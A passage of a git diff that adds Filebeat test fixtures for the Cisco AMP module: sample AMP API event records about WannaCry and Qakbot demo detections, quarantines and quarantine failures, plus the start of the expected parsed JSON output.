+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json new file mode 100644 index 000000000000..2dcd9193111e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json 
@@ -0,0 +1,2425 @@ +[ + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847664", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847663", + "cisco.amp.error.description": "Delete pending", + 
"cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1193, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847662", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 